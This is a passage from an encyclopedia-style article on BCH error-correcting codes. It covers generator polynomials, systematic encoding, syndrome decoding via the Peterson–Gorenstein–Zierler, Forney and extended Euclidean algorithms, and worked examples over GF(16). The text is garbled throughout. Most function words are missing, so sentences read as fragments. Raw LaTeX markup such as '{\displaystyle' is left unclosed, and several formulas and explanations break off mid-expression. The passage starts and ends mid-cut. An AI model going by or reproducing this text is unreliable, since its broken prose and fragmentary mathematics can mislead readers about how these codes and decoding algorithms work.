{lcm}}(m_{1}(x),m_{2}(x),...,m_{14}(x))=m_{1}(x)m_{3}(x)m_{5}(x)m_{7}(x)\\&amp;=\left(x^{4}+x+1\right)\left(x^{4}+x^{3}+x^{2}+x+1\right)\left(x^{2}+x+1\right)\left(x^{4}+x^{3}+1\right)=x^{14}+x^{13}+x^{12}+\cdots +x^{2}+x+1.\end{aligned}}} this code minimal hamming distance corrects errors. data checksum bits. fact, code codewords: 000000000000000 111111111111111. general codes general codes differ primitive narrow-sense codes respects. first, requirement {\displaystyle \alpha primitive element {\displaystyle \mathrm {gf} (q^{m})} relaxed. relaxing requirement, code length changes {\displaystyle q^{m}-1} {\displaystyle \mathrm {ord} (\alpha order element {\displaystyle \alpha second, consecutive roots generator polynomial {\displaystyle \alpha ^{c},\ldots ,\alpha ^{c+d-2}} instead {\displaystyle \alpha ,\ldots ,\alpha ^{d-1}.} definition. finite field {\displaystyle gf(q),} {\displaystyle prime power. choose positive integers {\displaystyle m,n,d,c} {\displaystyle 2\leq d\leq {\displaystyle {\rm {gcd}}(n,q)=1,} {\displaystyle multiplicative order {\displaystyle modulo {\displaystyle before, {\displaystyle \alpha primitive {\displaystyle root unity {\displaystyle gf(q^{m}),} {\displaystyle m_{i}(x)} minimal polynomial {\displaystyle gf(q)} {\displaystyle \alpha ^{i}} {\displaystyle generator polynomial code defined least common multiple {\displaystyle g(x)={\rm {lcm}}(m_{c}(x),\ldots ,m_{c+d-2}(x)).} note: {\displaystyle n=q^{m}-1} simplified definition, {\displaystyle {\rm {gcd}}(n,q)} order {\displaystyle modulo {\displaystyle {\displaystyle therefore, simplified definition indeed special case general one. special cases code {\displaystyle c=1} called narrow-sense code. code {\displaystyle n=q^{m}-1} called primitive.the generator polynomial {\displaystyle g(x)} code coefficients {\displaystyle \mathrm {gf} (q).} general, cyclic code {\displaystyle \mathrm {gf} (q^{p})} {\displaystyle g(x)} generator polynomial called code {\displaystyle \mathrm {gf} (q^{p}).} code {\displaystyle \mathrm {gf} (q^{m})} generator polynomial {\displaystyle g(x)} successive powers {\displaystyle \alpha roots type reed–solomon code decoder (syndromes) alphabet channel (data generator polynomial) alphabet, elements {\displaystyle \mathrm {gf} (q^{m})} type reed solomon code original view reed solomon code code. properties generator polynomial code degree {\displaystyle (d-1)m} moreover, {\displaystyle q=2} {\displaystyle c=1} generator polynomial degree {\displaystyle dm/2} code minimal hamming distance least {\displaystyle code cyclic. encoding because polynomial multiple generator polynomial valid codeword, encoding merely process finding polynomial generator factor. code prescriptive meaning coefficients polynomial; conceptually, decoding algorithm's sole concern find valid codeword minimal hamming distance received codeword. therefore, code implemented either systematic code not, depending implementor chooses embed message encoded polynomial. non-systematic encoding: message factor straightforward find polynomial multiple generator compute product arbitrary polynomial generator. case, arbitrary polynomial chosen using symbols message coefficients. {\displaystyle s(x)=p(x)g(x)} example, consider generator polynomial {\displaystyle g(x)=x^{10}+x^{9}+x^{8}+x^{6}+x^{5}+x^{3}+1} chosen (31, binary code used pocsag others. encode 21-bit message {101101110111101111101}, first represent polynomial {\displaystyle gf(2)} {\displaystyle p(x)=x^{20}+x^{18}+x^{17}+x^{15}+x^{14}+x^{13}+x^{11}+x^{10}+x^{9}+x^{8}+x^{6}+x^{5}+x^{4}+x^{3}+x^{2}+1} then, compute (also {\displaystyle gf(2)} {\displaystyle {\begin{aligned}s(x)&amp;=p(x)g(x)\\&amp;=\left(x^{20}+x^{18}+x^{17}+x^{15}+x^{14}+x^{13}+x^{11}+x^{10}+x^{9}+x^{8}+x^{6}+x^{5}+x^{4}+x^{3}+x^{2}+1\right)\left(x^{10}+x^{9}+x^{8}+x^{6}+x^{5}+x^{3}+1\right)\\&amp;=x^{30}+x^{29}+x^{26}+x^{25}+x^{24}+x^{22}+x^{19}+x^{17}+x^{16}+x^{15}+x^{14}+x^{12}+x^{10}+x^{9}+x^{8}+x^{6}+x^{5}+x^{4}+x^{2}+1\end{aligned}}} thus, transmitted codeword {1100111010010111101011101110101}. receiver bits coefficients {\displaystyle s(x)} and, error-correction ensure valid codeword, recompute {\displaystyle p(x)=s(x)/g(x)} systematic encoding: message prefix systematic code message appears verbatim somewhere within codeword. therefore, systematic encoding involves first embedding message polynomial within codeword polynomial, adjusting coefficients remaining (non-message) terms ensure {\displaystyle s(x)} divisible {\displaystyle g(x)} this encoding method leverages fact subtracting remainder dividend results multiple divisor. hence, take message polynomial {\displaystyle p(x)} multiply {\displaystyle x^{n-k}} "shift" message remainder), euclidean division polynomials yield: {\displaystyle p(x)x^{n-k}=q(x)g(x)+r(x)} here, {\displaystyle q(x)g(x)} valid codeword. {\displaystyle r(x)} always degree less {\displaystyle n-k} (which degree {\displaystyle g(x)} safely subtract {\displaystyle p(x)x^{n-k}} without altering message coefficients, hence {\displaystyle s(x)} {\displaystyle s(x)=q(x)g(x)=p(x)x^{n-k}-r(x)} over {\displaystyle gf(2)} (i.e. binary codes), process indistinguishable appending cyclic redundancy check, systematic binary code used error-detection purposes, codes generalization mathematics cyclic redundancy checks. advantage systematic coding receiver recover original message discarding everything first {\displaystyle coefficients, performing error correction. decoding there many algorithms decoding codes. common ones follow general outline: calculate syndromes received vector determine number errors error locator polynomial λ(x) syndromes calculate roots error location polynomial find error locations calculate error values error locations correct errorsduring steps, decoding algorithm determine received vector many errors cannot corrected. example, appropriate value found, correction would fail. truncated (not primitive) code, error location range. received vector errors code correct, decoder unknowingly produce apparently valid message sent. calculate syndromes received vector {\displaystyle correct codeword {\displaystyle unknown error vector {\displaystyle syndrome values formed considering {\displaystyle polynomial evaluating {\displaystyle \alpha ^{c},\ldots ,\alpha ^{c+d-2}.} thus syndromes {\displaystyle s_{j}=r\left(\alpha ^{j}\right)=c\left(\alpha ^{j}\right)+e\left(\alpha ^{j}\right)} {\displaystyle j=c} {\displaystyle c+d-2.} since {\displaystyle \alpha ^{j}} zeros {\displaystyle g(x),} {\displaystyle c(x)} multiple, {\displaystyle c\left(\alpha ^{j}\right)=0.} examining syndrome values thus isolates error vector begin solve error, {\displaystyle s_{j}=0} {\displaystyle syndromes zero, decoding done. calculate error location polynomial nonzero syndromes, errors. decoder needs figure many errors location errors. single error, write {\displaystyle e(x)=e\,x^{i},} {\displaystyle location error {\displaystyle magnitude. then first syndromes {\displaystyle {\begin{aligned}s_{c}&amp;=e\,\alpha ^{c\,i}\\s_{c+1}&amp;=e\,\alpha ^{(c+1)\,i}=\alpha ^{i}s_{c}\end{aligned}}} together allow calculate {\displaystyle provide information {\displaystyle (completely determining case reed–solomon codes). errors, {\displaystyle e(x)=e_{1}x^{i_{1}}+e_{2}x^{i_{2}}+\cdots immediately obvious begin solving resulting syndromes unknowns {\displaystyle e_{k}} {\displaystyle i_{k}.} first step finding, compatible computed syndromes minimal possible {\displaystyle locator polynomial: {\displaystyle \lambda (x)=\prod _{j=1}^{t}\left(x\alpha ^{i_{j}}-1\right)} three popular algorithms task are: peterson–gorenstein–zierler algorithm berlekamp–massey algorithm sugiyama euclidean algorithm peterson–gorenstein–zierler algorithm peterson's algorithm step generalized decoding procedure. peterson's algorithm used calculate error locator polynomial coefficients {\displaystyle \lambda _{1},\lambda _{2},\dots ,\lambda _{v}} polynomial {\displaystyle \lambda (x)=1+\lambda _{1}x+\lambda _{2}x^{2}+\cdots +\lambda _{v}x^{v}.} procedure peterson–gorenstein–zierler algorithm. expect least syndromes sc+2t−1. factor error locator polynomial {\displaystyle \lambda (x)} polynomial, roots found form {\displaystyle \lambda (x)=\left(\alpha ^{i_{1}}x-1\right)\left(\alpha ^{i_{2}}x-1\right)\cdots \left(\alpha ^{i_{v}}x-1\right)} brute force example using chien search algorithm. exponential powers primitive element {\displaystyle \alpha yield positions errors occur received word; hence name 'error locator' polynomial. zeros λ(x) α−i1, α−iv. calculate error values once error locations known, next step determine error values locations. error values used correct received values locations recover original codeword. case binary bch, (with characters readable) trivial; flip bits received word positions, corrected code word. general case, error weights {\displaystyle e_{j}} determined solving linear system {\displaystyle {\begin{aligned}s_{c}&amp;=e_{1}\alpha ^{c\,i_{1}}+e_{2}\alpha ^{c\,i_{2}}+\cdots \\s_{c+1}&amp;=e_{1}\alpha ^{(c+1)\,i_{1}}+e_{2}\alpha ^{(c+1)\,i_{2}}+\cdots \\&amp;{}\ \vdots \end{aligned}}} forney algorithm however, efficient method known forney algorithm. {\displaystyle s(x)=s_{c}+s_{c+1}x+s_{c+2}x^{2}+\cdots +s_{c+d-2}x^{d-2}.} {\displaystyle v\leqslant d-1,\lambda _{0}\neq 0\qquad \lambda (x)=\sum _{i=0}^{v}\lambda _{i}x^{i}=\lambda _{0}\prod _{k=0}^{v}\left(\alpha ^{-i_{k}}x-1\right).} error evaluator polynomial {\displaystyle \omega (x)\equiv s(x)\lambda (x){\bmod {x^{d-1}}}} finally: {\displaystyle \lambda '(x)=\sum _{i=1}^{v}i\cdot \lambda _{i}x^{i-1},} {\displaystyle i\cdot x:=\sum _{k=1}^{i}x.} than syndromes could explained error word, could nonzero positions {\displaystyle i_{k}} error values {\displaystyle e_{k}=-{\alpha ^{i_{k}}\omega \left(\alpha ^{-i_{k}}\right) \over \alpha ^{c\cdot i_{k}}\lambda '\left(\alpha ^{-i_{k}}\right)}.} narrow-sense codes, expression simplifies {\displaystyle e_{k}=-{\omega \left(\alpha ^{-i_{k}}\right) \over \lambda '\left(\alpha ^{-i_{k}}\right)}.} explanation forney algorithm computation based lagrange interpolation techniques generating functions. consider {\displaystyle s(x)\lambda (x),} sake simplicity suppose {\displaystyle \lambda _{k}=0} {\displaystyle k&gt;v,} {\displaystyle s_{k}=0} {\displaystyle k&gt;c+d-2.} then {\displaystyle s(x)\lambda (x)=\sum _{j=0}^{\infty }\sum _{i=0}^{j}s_{j-i+1}\lambda _{i}x^{j}.} {\displaystyle {\begin{aligned}s(x)\lambda (x)&amp;=s(x)\left\{\lambda _{0}\prod _{\ell =1}^{v}\left(\alpha ^{i_{\ell }}x-1\right)\right\}\\&amp;=\left\{\sum _{i=0}^{d-2}\sum _{j=1}^{v}e_{j}\alpha ^{(c+i)\cdot i_{j}}x^{i}\right\}\left\{\lambda _{0}\prod _{\ell =1}^{v}\left(\alpha ^{i_{\ell }}x-1\right)\right\}\\&amp;=\left\{\sum _{j=1}^{v}e_{j}\alpha ^{ci_{j}}\sum _{i=0}^{d-2}\left(\alpha ^{i_{j}}\right)^{i}x^{i}\right\}\left\{\lambda _{0}\prod _{\ell =1}^{v}\left(\alpha ^{i_{\ell }}x-1\right)\right\}\\&amp;=\left\{\sum _{j=1}^{v}e_{j}\alpha ^{ci_{j}}{\frac {\left(x\alpha ^{i_{j}}\right)^{d-1}-1}{x\alpha ^{i_{j}}-1}}\right\}\left\{\lambda _{0}\prod _{\ell =1}^{v}\left(\alpha ^{i_{\ell }}x-1\right)\right\}\\&amp;=\lambda _{0}\sum _{j=1}^{v}e_{j}\alpha ^{ci_{j}}{\frac {\left(x\alpha ^{i_{j}}\right)^{d-1}-1}{x\alpha ^{i_{j}}-1}}\prod _{\ell =1}^{v}\left(\alpha ^{i_{\ell }}x-1\right)\\&amp;=\lambda _{0}\sum _{j=1}^{v}e_{j}\alpha ^{ci_{j}}\left(\left(x\alpha ^{i_{j}}\right)^{d-1}-1\right)\prod _{\ell \{1,\cdots ,v\}\setminus \{j\}}\left(\alpha ^{i_{\ell }}x-1\right)\end{aligned}}} want compute unknowns {\displaystyle e_{j},} could simplify context removing {\displaystyle \left(x\alpha ^{i_{j}}\right)^{d-1}} terms. this leads error evaluator polynomial {\displaystyle \omega (x)\equiv s(x)\lambda (x){\bmod {x^{d-1}}}.} thanks {\displaystyle v\leqslant d-1} {\displaystyle \omega (x)=-\lambda _{0}\sum _{j=1}^{v}e_{j}\alpha ^{ci_{j}}\prod _{\ell \{1,\cdots ,v\}\setminus \{j\}}\left(\alpha ^{i_{\ell }}x-1\right).} thanks {\displaystyle \lambda (the lagrange interpolation trick) degenerates summand {\displaystyle x=\alpha ^{-i_{k}}} {\displaystyle \omega \left(\alpha ^{-i_{k}}\right)=-\lambda _{0}e_{k}\alpha ^{c\cdot i_{k}}\prod _{\ell \{1,\cdots ,v\}\setminus \{k\}}\left(\alpha ^{i_{\ell }}\alpha ^{-i_{k}}-1\right).} {\displaystyle e_{k}} product. could compute product directly already computed roots {\displaystyle \alpha ^{-i_{j}}} {\displaystyle \lambda could simpler form. formal derivative {\displaystyle \lambda '(x)=\lambda _{0}\sum _{j=1}^{v}\alpha ^{i_{j}}\prod _{\ell \{1,\cdots ,v\}\setminus \{j\}}\left(\alpha ^{i_{\ell }}x-1\right),} summand {\displaystyle \lambda '\left(\alpha ^{-i_{k}}\right)=\lambda _{0}\alpha ^{i_{k}}\prod _{\ell \{1,\cdots ,v\}\setminus \{k\}}\left(\alpha ^{i_{\ell }}\alpha ^{-i_{k}}-1\right).} finally {\displaystyle e_{k}=-{\frac {\alpha ^{i_{k}}\omega \left(\alpha ^{-i_{k}}\right)}{\alpha ^{c\cdot i_{k}}\lambda '\left(\alpha ^{-i_{k}}\right)}}.} this formula advantageous computes formal derivative {\displaystyle \lambda form {\displaystyle \lambda (x)=\sum _{i=1}^{v}\lambda _{i}x^{i}} yielding: {\displaystyle \lambda '(x)=\sum _{i=1}^{v}i\cdot \lambda _{i}x^{i-1},} {\displaystyle i\cdot x:=\sum _{k=1}^{i}x.} decoding based extended euclidean algorithm alternate process finding polynomial error locator polynomial based yasuo sugiyama's adaptation extended euclidean algorithm. correction unreadable characters could incorporated algorithm easily well. {\displaystyle k_{1},...,k_{k}} positions unreadable characters. creates polynomial localising positions {\displaystyle \gamma (x)=\prod _{i=1}^{k}\left(x\alpha ^{k_{i}}-1\right).} values unreadable positions compute syndromes. already defined forney formula {\displaystyle s(x)=\sum _{i=0}^{d-2}s_{c+i}x^{i}.} extended euclidean algorithm locating least common divisor polynomials {\displaystyle s(x)\gamma (x)} {\displaystyle x^{d-1}.} goal find least common divisor, polynomial {\displaystyle r(x)} degree {\displaystyle \lfloor (d+k-3)/2\rfloor polynomials {\displaystyle a(x),b(x)} {\displaystyle r(x)=a(x)s(x)\gamma (x)+b(x)x^{d-1}.} degree {\displaystyle r(x)} guarantees, {\displaystyle a(x)} would satisfy extended {\displaystyle \gamma defining conditions {\displaystyle \lambda defining {\displaystyle (x)=a(x)\gamma (x)} using {\displaystyle place {\displaystyle \lambda (x)} fourney formula give error values. main advantage algorithm meanwhile computes {\displaystyle \omega (x)=s(x)\xi (x){\bmod {x}}^{d-1}=r(x)} required forney formula. explanation decoding process goal find codeword differs received word minimally possible readable positions. when expressing received word nearest codeword error word, trying find error word minimal number non-zeros readable positions. syndrom {\displaystyle s_{i}} restricts error word condition {\displaystyle s_{i}=\sum _{j=0}^{n-1}e_{j}\alpha ^{ij}.} could write conditions separately could create polynomial {\displaystyle s(x)=\sum _{i=0}^{d-2}s_{c+i}x^{i}} compare coefficients near powers {\displaystyle {\displaystyle d-2.} {\displaystyle s(x){\stackrel {\{0,\cdots ,\,d-2\}}{=}}e(x)=\sum _{i=0}^{d-2}\sum _{j=0}^{n-1}e_{j}\alpha ^{ij}\alpha ^{cj}x^{i}.} suppose unreadable letter position {\displaystyle k_{1},} could replace syndromes {\displaystyle \{s_{c},\cdots ,s_{c+d-2}\}} syndromes {\displaystyle \{t_{c},\cdots ,t_{c+d-3}\}} defined equation {\displaystyle t_{i}=\alpha ^{k_{1}}s_{i}-s_{i+1}.} suppose error word restrictions original {\displaystyle \{s_{c},\cdots ,s_{c+d-2}\}} syndromes hold, {\displaystyle t_{i}=\alpha ^{k_{1}}s_{i}-s_{i+1}=\alpha ^{k_{1}}\sum _{j=0}^{n-1}e_{j}\alpha ^{ij}-\sum _{j=0}^{n-1}e_{j}\alpha ^{j}\alpha ^{ij}=\sum _{j=0}^{n-1}e_{j}\left(\alpha ^{k_{1}}-\alpha ^{j}\right)\alpha ^{ij}.} syndromes restricts error vector {\displaystyle f_{j}=e_{j}\left(\alpha ^{k_{1}}-\alpha ^{j}\right)} original syndromes restricted error vector {\displaystyle e_{j}.} except coordinate {\displaystyle k_{1},} {\displaystyle f_{k_{1}}=0,} {\displaystyle f_{j}} zero, {\displaystyle e_{j}=0.} goal locating error positions could change syndromes similar reflect unreadable characters. this shortens syndromes {\displaystyle polynomial formulation, replacement syndromes {\displaystyle \{s_{c},\cdots ,s_{c+d-2}\}} syndromes {\displaystyle \{t_{c},\cdots ,t_{c+d-3}\}} leads {\displaystyle t(x)=\sum _{i=0}^{d-3}t_{c+i}x^{i}=\alpha ^{k_{1}}\sum _{i=0}^{d-3}s_{c+i}x^{i}-\sum _{i=1}^{d-2}s_{c+i}x^{i-1}.} therefore, {\displaystyle xt(x){\stackrel {\{1,\cdots ,\,d-2\}}{=}}\left(x\alpha ^{k_{1}}-1\right)s(x).} after replacement {\displaystyle s(x)} {\displaystyle s(x)\gamma (x)} would require equation coefficients near powers {\displaystyle k,\cdots ,d-2.} could consider looking error positions point view eliminating influence given positions similarly unreadable characters. found {\displaystyle positions eliminating influence leads obtaining syndromes consisting zeros, exists error vector errors coordinates. {\displaystyle \lambda (x)} denotes polynomial eliminating influence coordinates, obtain {\displaystyle s(x)\gamma (x)\lambda (x){\stackrel {\{k+v,\cdots ,d-2\}}{=}}0.} euclidean algorithm, correct {\displaystyle {\tfrac {1}{2}}(d-1-k)} errors readable positions), bigger error count could codewords distance received word. therefore, {\displaystyle \lambda (x)} looking for, equation must hold coefficients near powers starting {\displaystyle k+\left\lfloor {\frac {1}{2}}(d-1-k)\right\rfloor forney formula, {\displaystyle \lambda (x)} could multiplied scalar giving result. could happen euclidean algorithm finds {\displaystyle \lambda (x)} degree higher {\displaystyle {\tfrac {1}{2}}(d-1-k)} number different roots equal degree, fourney formula would able correct errors roots, anyway correcting many errors could risky (especially restrictions received word). usually getting {\displaystyle \lambda (x)} higher degree, decide correct errors. correction could fail case {\displaystyle \lambda (x)} roots higher multiplicity number roots smaller degree. fail could detected well forney formula returning error outside transmitted alphabet. correct errors using error values error location, correct errors form corrected code vector subtracting error values error locations. decoding examples decoding binary code without unreadable characters consider code gf(24) {\displaystyle d=7} {\displaystyle g(x)=x^{10}+x^{8}+x^{5}+x^{4}+x^{2}+x+1} (this used codes.) message transmitted polynomial notation, {\displaystyle m(x)=x^{4}+x^{3}+x+1.} "checksum" symbols calculated dividing {\displaystyle x^{10}m(x)} {\displaystyle g(x)} taking remainder, resulting {\displaystyle x^{9}+x^{4}+x^{2}} these appended message, transmitted codeword now, imagine bit-errors transmission, received codeword polynomial notation: {\displaystyle r(x)=c(x)+x^{13}+x^{5}=x^{14}+x^{11}+x^{10}+x^{9}+x^{5}+x^{4}+x^{2}} order correct errors, first calculate syndromes. taking 0010 {\displaystyle \alpha =0010,} 1011 {\displaystyle s_{1}=r(\alpha ^{1})=1011,} 1001 {\displaystyle s_{2}=1001,} 1011 {\displaystyle s_{3}=1011,} 1101 {\displaystyle s_{4}=1101,} 0001 {\displaystyle s_{5}=0001,} 1001. {\displaystyle s_{6}=1001.} next, apply peterson procedure row-reducing following augmented matrix. 1011 1001 1011 1101 1001 1011 1101 0001 1011 1101 0001 1001 0001 0000 1000 0111 0000 0001 1011 0001 0000 0000 0000 0000 {\displaystyle \left[s_{3\times 3}|c_{3\times 1}\right]={\begin{bmatrix}s_{1}&amp;s_{2}&amp;s_{3}&amp;s_{4}\\s_{2}&amp;s_{3}&amp;s_{4}&amp;s_{5}\\s_{3}&amp;s_{4}&amp;s_{5}&amp;s_{6}\end{bmatrix}}={\begin{bmatrix}1011&amp;1001&amp;1011&amp;1101\\1001&amp;1011&amp;1101&amp;0001\\1011&amp;1101&amp;0001&amp;1001\end{bmatrix}}\rightarrow {\begin{bmatrix}0001&amp;0000&amp;1000&amp;0111\\0000&amp;0001&amp;1011&amp;0001\\0000&amp;0000&amp;0000&amp;0000\end{bmatrix}}} zero row, s3×3 singular, surprise since errors introduced codeword. however, upper-left corner matrix identical [s2×2 c2×1], gives rise solution 1000 {\displaystyle \lambda _{2}=1000,} 1011. {\displaystyle \lambda _{1}=1011.} resulting error locator polynomial 1000 1011 0001 {\displaystyle \lambda (x)=1000x^{2}+1011x+0001,} zeros 0100 {\displaystyle 0100=\alpha ^{-13}} 0111 {\displaystyle 0111=\alpha ^{-5}.} exponents {\displaystyle \alpha correspond error locations. there need calculate error values example, possible value decoding unreadable characters suppose scenario, received word unreadable characters replace unreadable characters zeros creating polynomial reflecting positions {\displaystyle \gamma (x)=\left(\alpha ^{8}x-1\right)\left(\alpha ^{11}x-1\right).} compute syndromes {\displaystyle s_{1}=\alpha ^{-7},s_{2}=\alpha ^{1},s_{3}=\alpha ^{4},s_{4}=\alpha ^{2},s_{5}=\alpha ^{5},} {\displaystyle s_{6}=\alpha ^{-7}.} (using notation independent gf(24) isomorphisms. computation checking representation addition used previous example. hexadecimal description powers {\displaystyle \alpha consecutively 1,2,4,8,3,6,c,b,5,a,7,e,f,d,9 addition based bitwise xor.) make syndrome polynomial {\displaystyle s(x)=\alpha ^{-7}+\alpha ^{1}x+\alpha ^{4}x^{2}+\alpha ^{2}x^{3}+\alpha ^{5}x^{4}+\alpha ^{-7}x^{5},} compute {\displaystyle s(x)\gamma (x)=\alpha ^{-7}+\alpha ^{4}x+\alpha ^{-1}x^{2}+\alpha ^{6}x^{3}+\alpha ^{-1}x^{4}+\alpha ^{5}x^{5}+\alpha ^{7}x^{6}+\alpha ^{-3}x^{7}.} extended euclidean algorithm: {\displaystyle {\begin{aligned}&amp;{\begin{pmatrix}s(x)\gamma (x)\\x^{6}\end{pmatrix}}\\[6pt]={}&amp;{\begin{pmatrix}\alpha ^{-7}+\alpha ^{4}x+\alpha ^{-1}x^{2}+\alpha ^{6}x^{3}+\alpha ^{-1}x^{4}+\alpha ^{5}x^{5}+\alpha ^{7}x^{6}+\alpha ^{-3}x^{7}\\x^{6}\end{pmatrix}}\\[6pt]={}&amp;{\begin{pmatrix}\alpha ^{7}+\alpha ^{-3}x&amp;1\\1&amp;0\end{pmatrix}}{\begin{pmatrix}x^{6}\\\alpha ^{-7}+\alpha ^{4}x+\alpha ^{-1}x^{2}+\alpha ^{6}x^{3}+\alpha ^{-1}x^{4}+\alpha ^{5}x^{5}+2\alpha ^{7}x^{6}+2\alpha ^{-3}x^{7}\end{pmatrix}}\\[6pt]={}&amp;{\begin{pmatrix}\alpha ^{7}+\alpha ^{-3}x&amp;1\\1&amp;0\end{pmatrix}}{\begin{pmatrix}\alpha ^{4}+\alpha ^{-5}x&amp;1\\1&amp;0\end{pmatrix}}\\&amp;\qquad {\begin{pmatrix}\alpha ^{-7}+\alpha ^{4}x+\alpha ^{-1}x^{2}+\alpha ^{6}x^{3}+\alpha ^{-1}x^{4}+\alpha ^{5}x^{5}\\\alpha ^{-3}+\left(\alpha ^{-7}+\alpha ^{3}\right)x+\left(\alpha ^{3}+\alpha ^{-1}\right)x^{2}+\left(\alpha ^{-5}+\alpha ^{-6}\right)x^{3}+\left(\alpha ^{3}+\alpha ^{1}\right)x^{4}+2\alpha ^{-6}x^{5}+2x^{6}\end{pmatrix}}\\[6pt]={}&amp;{\begin{pmatrix}\left(1+\alpha ^{-4}\right)+\left(\alpha ^{1}+\alpha ^{2}\right)x+\alpha ^{7}x^{2}&amp;\alpha ^{7}+\alpha ^{-3}x\\\alpha ^{4}+\alpha ^{-5}x&amp;1\end{pmatrix}}{\begin{pmatrix}\alpha ^{-7}+\alpha ^{4}x+\alpha ^{-1}x^{2}+\alpha ^{6}x^{3}+\alpha ^{-1}x^{4}+\alpha ^{5}x^{5}\\\alpha ^{-3}+\alpha ^{-2}x+\alpha ^{0}x^{2}+\alpha ^{-2}x^{3}+\alpha ^{-6}x^{4}\end{pmatrix}}\\[6pt]={}&amp;{\begin{pmatrix}\alpha ^{-3}+\alpha ^{5}x+\alpha ^{7}x^{2}&amp;\alpha ^{7}+\alpha ^{-3}x\\\alpha ^{4}+\alpha ^{-5}x&amp;1\end{pmatrix}}{\begin{pmatrix}\alpha ^{-5}+\alpha ^{-4}x&amp;1\\1&amp;0\end{pmatrix}}\\&amp;\qquad {\begin{pmatrix}\alpha ^{-3}+\alpha ^{-2}x+\alpha ^{0}x^{2}+\alpha ^{-2}x^{3}+\alpha ^{-6}x^{4}\\\left(\alpha ^{7}+\alpha ^{-7}\right)+\left(2\alpha ^{-7}+\alpha ^{4}\right)x+\left(\alpha ^{-5}+\alpha ^{-6}+\alpha ^{-1}\right)x^{2}+\left(\alpha ^{-7}+\alpha ^{-4}+\alpha ^{6}\right)x^{3}+\left(\alpha ^{4}+\alpha ^{-6}+\alpha ^{-1}\right)x^{4}+2\alpha ^{5}x^{5}\end{pmatrix}}\\[6pt]={}&amp;{\begin{pmatrix}\alpha ^{7}x+\alpha ^{5}x^{2}+\alpha ^{3}x^{3}&amp;\alpha ^{-3}+\alpha ^{5}x+\alpha ^{7}x^{2}\\\alpha ^{3}+\alpha ^{-5}x+\alpha ^{6}x^{2}&amp;\alpha ^{4}+\alpha ^{-5}x\end{pmatrix}}{\begin{pmatrix}\alpha ^{-3}+\alpha ^{-2}x+\alpha ^{0}x^{2}+\alpha ^{-2}x^{3}+\alpha ^{-6}x^{4}\\\alpha ^{-4}+\alpha ^{4}x+\alpha ^{2}x^{2}+\alpha ^{-5}x^{3}\end{pmatrix}}.\end{aligned}}} reached polynomial degree {\displaystyle {\begin{pmatrix}-\left(\alpha ^{4}+\alpha ^{-5}x\right)&amp;\alpha ^{-3}+\alpha ^{5}x+\alpha ^{7}x^{2}\\\alpha ^{3}+\alpha ^{-5}x+\alpha ^{6}x^{2}&amp;-\left(\alpha ^{7}x+\alpha ^{5}x^{2}+\alpha ^{3}x^{3}\right)\end{pmatrix}}{\begin{pmatrix}\alpha ^{7}x+\alpha ^{5}x^{2}+\alpha ^{3}x^{3}&amp;\alpha ^{-3}+\alpha ^{5}x+\alpha ^{7}x^{2}\\\alpha ^{3}+\alpha ^{-5}x+\alpha ^{6}x^{2}&amp;\alpha ^{4}+\alpha ^{-5}x\end{pmatrix}}={\begin{pmatrix}1&amp;0\\0&amp;1\end{pmatrix}},} {\displaystyle {\begin{pmatrix}-\left(\alpha ^{4}+\alpha ^{-5}x\right)&amp;\alpha ^{-3}+\alpha ^{5}x+\alpha ^{7}x^{2}\\\alpha ^{3}+\alpha ^{-5}x+\alpha ^{6}x^{2}&amp;-\left(\alpha ^{7}x+\alpha ^{5}x^{2}+\alpha ^{3}x^{3}\right)\end{pmatrix}}{\begin{pmatrix}s(x)\gamma (x)\\x^{6}\end{pmatrix}}={\begin{pmatrix}\alpha ^{-3}+\alpha ^{-2}x+\alpha ^{0}x^{2}+\alpha ^{-2}x^{3}+\alpha ^{-6}x^{4}\\\alpha ^{-4}+\alpha ^{4}x+\alpha ^{2}x^{2}+\alpha ^{-5}x^{3}\end{pmatrix}}.} therefore, {\displaystyle s(x)\gamma (x)\left(\alpha ^{3}+\alpha ^{-5}x+\alpha ^{6}x^{2}\right)-\left(\alpha ^{7}x+\alpha ^{5}x^{2}+\alpha ^{3}x^{3}\right)x^{6}=\alpha ^{-4}+\alpha ^{4}x+\alpha ^{2}x^{2}+\alpha ^{-5}x^{3}.} {\displaystyle \lambda (x)=\alpha ^{3}+\alpha ^{-5}x+\alpha ^{6}x^{2}.} don't worry {\displaystyle \lambda _{0}\neq find brute force root {\displaystyle \lambda roots {\displaystyle \alpha ^{2},} {\displaystyle \alpha ^{10}} (after finding example {\displaystyle \alpha ^{2}} divide {\displaystyle \lambda corresponding monom {\displaystyle \left(x-\alpha ^{2}\right)} root resulting monom could found easily). {\displaystyle {\begin{aligned}\xi (x)&amp;=\gamma (x)\lambda (x)=\alpha ^{3}+\alpha ^{4}x^{2}+\alpha ^{2}x^{3}+\alpha ^{-5}x^{4}\\\omega (x)&amp;=s(x)\xi (x)\equiv \alpha ^{-4}+\alpha ^{4}x+\alpha ^{2}x^{2}+\alpha ^{-5}x^{3}{\bmod {x^{6}}}\end{aligned}}} look error values using formula {\displaystyle e_{j}=-{\frac {\omega \left(\alpha ^{-i_{j}}\right)}{\xi '\left(\alpha ^{-i_{j}}\right)}},} {\displaystyle \alpha ^{-i_{j}}} roots {\displaystyle (x).} {\displaystyle '(x)=\alpha ^{2}x^{2}.} {\displaystyle {\begin{aligned}e_{1}&amp;=-{\frac {\omega (\alpha ^{4})}{\xi '(\alpha ^{4})}}={\frac {\alpha ^{-4}+\alpha ^{-7}+\alpha ^{-5}+\alpha ^{7}}{\alpha ^{-5}}}={\frac {\alpha ^{-5}}{\alpha ^{-5}}}=1\\e_{2}&amp;=-{\frac {\omega (\alpha ^{7})}{\xi '(\alpha ^{7})}}={\frac {\alpha ^{-4}+\alpha ^{-4}+\alpha ^{1}+\alpha ^{1}}{\alpha ^{1}}}=0\\e_{3}&amp;=-{\frac {\omega (\alpha ^{10})}{\xi '(\alpha ^{10})}}={\frac {\alpha ^{-4}+\alpha ^{-1}+\alpha ^{7}+\alpha ^{-5}}{\alpha ^{7}}}={\frac {\alpha ^{7}}{\alpha ^{7}}}=1\\e_{4}&amp;=-{\frac {\omega (\alpha ^{2})}{\xi '(\alpha ^{2})}}={\frac {\alpha ^{-4}+\alpha ^{6}+\alpha ^{6}+\alpha ^{1}}{\alpha ^{6}}}={\frac {\alpha ^{6}}{\alpha ^{6}}}=1\end{aligned}}} fact, {\displaystyle e_{3}=e_{4}=1,} surprising. corrected code therefore decoding unreadable characters small number errors show algorithm behaviour case small number errors. received word again, replace unreadable characters zeros creating polynomial reflecting positions {\displaystyle \gamma (x)=\left(\alpha ^{8}x-1\right)\left(\alpha ^{11}x-1\right).} compute syndromes {\displaystyle s_{1}=\alpha ^{4},s_{2}=\alpha 